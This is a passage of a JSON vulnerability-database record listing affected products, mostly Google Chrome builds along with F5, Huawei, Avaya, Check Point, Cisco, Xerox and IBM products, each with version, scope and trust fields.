"version": "5.0.372.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.91" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.77" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.949.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.638.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.450.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.392.0" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.212" }, { "model": null, "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2053-4340" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.302.1" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1063" }, { "model": "gaia embedded r75.30", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.710.0" }, { "model": "sig9800 sig9800-x16 v300r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.206" }, { "model": "fusioncompute v100r003c10cp6001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.289.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.11" }, { "model": "vcloud networking and security", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.1.4.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.96" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1685.0" }, { "model": "vpn gateway", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "3070" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.735.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.568.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.487.0" }, { "model": "ipso r70.50", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.302.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.129" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.124" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.9" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.590.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.113" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.4.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.827.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.23" }, { "model": "rack server rh5885 v100r003c0", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v3" }, { "model": "gaia r71.10", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "system storage san04b-r 2005-r04", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.89" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.332.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.107" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.953.0" }, { "model": "oceanstor s2600t v100r005c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.666.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1071.0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1013.0" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "collaboration pod on vmware vcenter server appliance", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.41" }, { "model": "next generation firewall", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.0.23988" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.73" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.83" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.275.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.340.0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "57450" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.373.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.87" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.2" }, { "model": "thinpro", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1036.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.50" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50006.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.353.0" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.408.2" }, { "model": "gaia r75.30", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "7228" }, { "model": "oceanstor s6900 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.26" }, { "model": "policy assessment and compliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.47" }, { "model": "secureplatform r75.30", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.470.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.461.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1285.1" }, { "model": "prime infrastructure", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.446.0" }, { "model": "secureplatform r75.47", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "move firewall", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "3.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.88" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.5" }, { "model": "nsmxpress appliances", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.357.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.459.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.541.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.221" }, { "model": "espace u2980 v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.65" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.18" }, { "model": "nexus switch for nexus series 4.1 e1", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1000v4000" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.333.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.779.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.90" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.57" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.42" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "6655" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.9" }, { "model": "bsc6000 v900r008c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.307" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.121" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.127" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1027" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.396.0" }, { "model": "network security manager", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.1.157" }, { "model": "bsc6000 v901r013c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.110" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.101" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.428.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.612.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.95" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.92" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1035.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.767.0" }, { "model": "colorqube", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "9301" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.891.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.460.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1001.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.87" }, { "model": "siem enterprise security manager", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "9.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.2" }, { "model": "vcloud networking and security", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5" }, { "model": "galax8800 v100r002c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "secureplatform r71.50", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.466.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1053" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.74" }, { "model": "viewplanner", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "3.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.8" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "5945" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.455.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1014.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.220" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.210" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.449.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.142" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.911.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.72" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.620.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.497.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.82" }, { "model": "oceanstor s5900 v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.576.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1015.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.795.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "secureplatform r76", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.213" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1010.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.12" }, { "model": "gaia embedded r70.40", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.148" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.99" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1682.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.437.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.751.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.636.0" }, { "model": "secure access link gas", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "oceanstor s5300 v100r005c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.91" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.313" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.360.5" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "65.72" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.12" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "57400" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.64" }, { "model": "big-iq cloud", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1670.5" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.456.0" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.831.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.65" }, { "model": "saas email protection", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "1.0" }, { "model": "oceanstor s6800t v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "high-density server dh621 v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.38" }, { "model": "big-iq security", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.2" }, { "model": "secureplatform r76", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.111" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.67" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.550.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1305.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.583.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.317.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.595.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1009" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.131" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.108" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.3.154.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.94" }, { "model": "virtual security gateway for microsoft hyper-v", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.866.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1673.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.72" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.101" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "workcentre spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7545061.121.225.06100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.85" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.131" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.15" }, { "model": "secureplatform r71.10", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.128" }, { "model": "configuration and orchestration manager vps", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.342.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.62" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-320" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.653.0" }, { "model": "aura application server sip core pb16", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1656.1" }, { "model": "associates layer api management portal", "scope": "eq", "trust": 0.3, "vendor": "computer", "version": "70" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.92" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.35" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0.00" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.713.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.643.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.22" }, { "model": "fusioncompute v100r003c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1057.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.228" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.2" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.1" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.504.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.12" }, { "model": "ipso r71.40", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "unstructured data identification and mgmt", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.767.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1292.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1058.0" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-370" }, { 